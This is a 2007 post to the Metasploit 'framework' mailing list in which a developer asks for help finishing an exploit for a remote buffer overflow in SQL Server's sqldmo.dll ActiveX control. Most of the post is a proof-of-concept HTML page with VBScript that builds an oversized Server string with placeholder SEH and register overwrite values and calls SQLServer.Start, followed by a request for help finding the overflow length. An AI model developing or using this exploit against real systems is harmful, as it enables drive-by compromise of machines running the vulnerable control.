[framework] Microsoft SQL Server Distributed Management Objects OLE DLL for

Manish Gupta manish.gupta at ariosesoftware.com
Thu Sep 13 07:34:39 CDT 2007 

Hi

 

 

Am working on "Microsoft SQL Server Distributed Management Objects OLE DLL
for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" on this
vulnerability whose exploit is 
 
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer'
/></object>
<script language='vbscript'>
 
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As
Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4
 
'edx = ecx
edx       ="bb"
seh       ="aa"
StartMode =True
Server
="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\te
s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\
\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\
test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx
+
"nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR
R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC
C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#
$%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff
fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login     ="aaaaaaaa"
Password  ="bbbbbbbb"
 
SQLServer.Start StartMode ,Server ,Login ,Password
 
</script>
</html>
 
 
 
I am not able to find the server length so please help me. 
Server
="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\te
s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\
\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\
test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx
+
"nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR
R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC
C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#
$%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff
fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
\\
 

 

 

Regards

Manish Gupta

Ariose Software 

Noida (U.P)

Mbl:-+91-9891650667

 

 

 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20070913/6c077e44/attachment.htm

More information about the framework mailing list